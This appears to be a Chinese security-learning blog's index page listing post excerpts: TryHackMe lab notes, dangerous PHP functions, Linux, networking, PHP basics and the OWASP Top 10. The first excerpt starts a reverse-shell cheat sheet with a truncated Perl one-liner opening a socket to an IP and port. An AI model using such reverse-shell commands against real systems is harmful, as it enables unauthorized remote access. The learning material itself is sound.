Xia0_0

摘要： https://github.com/security-cheatsheet/reverse-shell-cheatsheet 反向shell作弊表 perl -e 'use Socket; $i="192.168.0.5"; # 目标 IP 地址 $p=4545; # 目标端口 socket(S, 阅读全文

摘要： PS:我写的这不是完整的做题wp,而是针对这个靶机做些提炼和总结，完整的wp推荐 目标是拿到普通用户和root用户的flag，换句话说，就是拿到相应权限 要点 连接 直接访问靶机IP，会出现这个 原因是.thm不是个标准域名后缀，一般用于TryHackMe这样的渗透测试平台或内部网络环境。所以直接访 阅读全文

摘要： 危险函数 passthru() 直接输出命令执行的原始结果 system() 执行一个外部程序，并显示输出。 shell_exec() 执行一个命令并将整个输出以字符串返回 dl() 运行时加载 PHP 扩展库 mail() 邮件发送 putenv() 环境控制 phpinfo.php DOCUME 阅读全文

摘要： THM THM是个极好的网络安全学习靶场，但是针对国内的网络情况和thm官方并没有对大陆进行相应的网络优化，故经常无法用自己的虚拟机openvp嗯 连接至靶机，我本人也折腾了老长时间，故写篇博客梳理下要点。 如遇到问题，建议挨个排查，以kali虚拟机为例 网络环境： 主机tun+nat（推荐这个） 阅读全文

摘要： linux Linux背景知识 Linux系统的背景知识，常见版本和特点 🧠 一、Linux 是什么？ Linux 是一个自由开源的类 Unix 操作系统内核，由芬兰人 Linus Torvalds 于 1991 年发布。 它具有： 🆓 自由开源（源代码可查看、可修改） ⚙️ 稳定安全（广泛用于 阅读全文

摘要： 中间件 中间件基础 中间件的概念和技术 什么是中间件？ 中间件是一个连接不同程序、系统和服务的“桥梁”，让它们能够相互沟通和协作。 中间件的作用？ 连接不同系统：让不同的应用、服务或数据库能够互相交流。 提高效率：帮助多个应用程序并行工作，提高系统的运行效率。 确保安全性：管理用户权限、加密数据等。 阅读全文

摘要： 搜索工具 google bing 微信搜索(相当好用) VM 在大多数虚拟机软件中（比如 VMware、VirtualBox），网络通常有 三种基本模式： 🌐 1. 桥接模式（Bridged） 就像虚拟机是一台真正连接到你局域网的独立电脑。 📡 网络结构：虚拟机直接桥接到宿主机的网卡上，跟宿主机 阅读全文

摘要： PHP： php是一个后端语言，Hypertext Preprocessor，即"PHP：超文本预处理器" <?php echo "Hello World!"; ?> 输出文本的基础指令：echo 和 print 注释方式： # 这是单行注释 // 这也是单行注释 /* 这是多行注释 多行注释 多行 阅读全文

摘要： 网络 网络原理 网络功能 网络的概念 网络是指多个设备（如计算机、服务器、路由器等）通过通信介质（如网线、无线信号）连接在一起，以实现数据交换和资源共享。 网络拓扑分类 网络拓扑是指网络设备如何连接的结构方式，主要分为以下几种： 总线型（Bus） 所有设备连接到同一条主干线路上 结构简单，成本低，但 阅读全文

摘要： OWASP-TOP10,网络空间中常见的10大类型漏洞 Broken Access Control 访问控制失效 Cryptographic Failures 加密失效 Injection 注入 用户控制的输入被应用程序解释为实际的命令或参数。 常见的有SQL注入和命令注入 Linux whoami 阅读全文